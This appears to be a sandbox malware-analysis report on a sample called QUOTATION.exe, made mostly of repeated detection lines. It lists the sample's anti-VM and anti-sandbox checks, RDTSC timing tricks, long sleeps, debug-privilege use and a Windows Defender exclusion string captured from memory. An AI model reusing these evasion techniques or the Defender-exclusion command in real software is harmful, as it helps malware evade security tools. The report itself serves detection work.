          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 1.2.QUOTATION.exe.2751384.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTATION.exe PID: 6924, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000739904 second address: 000000000073990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000739B7E second address: 0000000000739B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exe TID: 6928Thread sleep time: -38290s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exe TID: 6992Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -9223372036854770s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2808Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6172Thread sleep time: -32000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00409AB0 rdtsc 17_2_00409AB0
          Source: C:\Users\user\Desktop\QUOTATION.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7319Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1199Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeThread delayed: delay time: 38290Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000013.00000000.328622205.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00409AB0 rdtsc 17_2_00409AB0
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD58EC mov eax, dword ptr fs:[00000030h]17_2_00FD58EC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB8E4 mov eax, dword ptr fs:[00000030h]17_2_00FFB8E4
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB8E4 mov eax, dword ptr fs:[00000030h]17_2_00FFB8E4
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD40E1 mov eax, dword ptr fs:[00000030h]17_2_00FD40E1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD40E1 mov eax, dword ptr fs:[00000030h]17_2_00FD40E1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD40E1 mov eax, dword ptr fs:[00000030h]17_2_00FD40E1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100513A mov eax, dword ptr fs:[00000030h]17_2_0100513A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100513A mov eax, dword ptr fs:[00000030h]17_2_0100513A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9080 mov eax, dword ptr fs:[00000030h]17_2_00FD9080
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A185 mov eax, dword ptr fs:[00000030h]17_2_0100A185
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002990 mov eax, dword ptr fs:[00000030h]17_2_01002990
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010061A0 mov eax, dword ptr fs:[00000030h]17_2_010061A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010061A0 mov eax, dword ptr fs:[00000030h]17_2_010061A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010569A6 mov eax, dword ptr fs:[00000030h]17_2_010569A6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010949A4 mov eax, dword ptr fs:[00000030h]17_2_010949A4
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010949A4 mov eax, dword ptr fs:[00000030h]17_2_010949A4
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010949A4 mov eax, dword ptr fs:[00000030h]17_2_010949A4
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010949A4 mov eax, dword ptr fs:[00000030h]17_2_010949A4
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF0050 mov eax, dword ptr fs:[00000030h]17_2_00FF0050
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF0050 mov eax, dword ptr fs:[00000030h]17_2_00FF0050
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010551BE mov eax, dword ptr fs:[00000030h]17_2_010551BE
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010551BE mov eax, dword ptr fs:[00000030h]17_2_010551BE
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010551BE mov eax, dword ptr fs:[00000030h]17_2_010551BE
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010551BE mov eax, dword ptr fs:[00000030h]17_2_010551BE
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA830 mov eax, dword ptr fs:[00000030h]17_2_00FFA830
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA830 mov eax, dword ptr fs:[00000030h]17_2_00FFA830
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA830 mov eax, dword ptr fs:[00000030h]17_2_00FFA830
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA830 mov eax, dword ptr fs:[00000030h]17_2_00FFA830
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEB02A mov eax, dword ptr fs:[00000030h]17_2_00FEB02A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEB02A mov eax, dword ptr fs:[00000030h]17_2_00FEB02A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEB02A mov eax, dword ptr fs:[00000030h]17_2_00FEB02A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEB02A mov eax, dword ptr fs:[00000030h]17_2_00FEB02A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010641E8 mov eax, dword ptr fs:[00000030h]17_2_010641E8
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057016 mov eax, dword ptr fs:[00000030h]17_2_01057016
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057016 mov eax, dword ptr fs:[00000030h]17_2_01057016
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057016 mov eax, dword ptr fs:[00000030h]17_2_01057016
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDB1E1 mov eax, dword ptr fs:[00000030h]17_2_00FDB1E1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDB1E1 mov eax, dword ptr fs:[00000030h]17_2_00FDB1E1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDB1E1 mov eax, dword ptr fs:[00000030h]17_2_00FDB1E1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A4015 mov eax, dword ptr fs:[00000030h]17_2_010A4015
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A4015 mov eax, dword ptr fs:[00000030h]17_2_010A4015
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]17_2_0100002D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]17_2_0100002D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]17_2_0100002D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]17_2_0100002D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]17_2_0100002D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov eax, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov eax, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov eax, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF mov eax, dword ptr fs:[00000030h]17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092073 mov eax, dword ptr fs:[00000030h]17_2_01092073
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFC182 mov eax, dword ptr fs:[00000030h]17_2_00FFC182
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A1074 mov eax, dword ptr fs:[00000030h]17_2_010A1074
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01053884 mov eax, dword ptr fs:[00000030h]17_2_01053884
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01053884 mov eax, dword ptr fs:[00000030h]17_2_01053884
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDB171 mov eax, dword ptr fs:[00000030h]17_2_00FDB171
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDB171 mov eax, dword ptr fs:[00000030h]17_2_00FDB171
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC962 mov eax, dword ptr fs:[00000030h]17_2_00FDC962
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]17_2_010020A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]17_2_010020A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]17_2_010020A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]17_2_010020A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]17_2_010020A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]17_2_010020A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010190AF mov eax, dword ptr fs:[00000030h]17_2_010190AF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB944 mov eax, dword ptr fs:[00000030h]17_2_00FFB944
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB944 mov eax, dword ptr fs:[00000030h]17_2_00FFB944
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100F0BF mov ecx, dword ptr fs:[00000030h]17_2_0100F0BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100F0BF mov eax, dword ptr fs:[00000030h]17_2_0100F0BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100F0BF mov eax, dword ptr fs:[00000030h]17_2_0100F0BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]17_2_0106B8D0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov ecx, dword ptr fs:[00000030h]17_2_0106B8D0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]17_2_0106B8D0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]17_2_0106B8D0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]17_2_0106B8D0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]17_2_0106B8D0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120 mov eax, dword ptr fs:[00000030h]17_2_00FF4120
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120 mov eax, dword ptr fs:[00000030h]17_2_00FF4120
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120 mov eax, dword ptr fs:[00000030h]17_2_00FF4120
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120 mov eax, dword ptr fs:[00000030h]17_2_00FF4120
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF4120 mov ecx, dword ptr fs:[00000030h]17_2_00FF4120
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9100 mov eax, dword ptr fs:[00000030h]17_2_00FD9100
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9100 mov eax, dword ptr fs:[00000030h]17_2_00FD9100
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD9100 mov eax, dword ptr fs:[00000030h]17_2_00FD9100
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109131B mov eax, dword ptr fs:[00000030h]17_2_0109131B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEAAB0 mov eax, dword ptr fs:[00000030h]17_2_00FEAAB0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEAAB0 mov eax, dword ptr fs:[00000030h]17_2_00FEAAB0
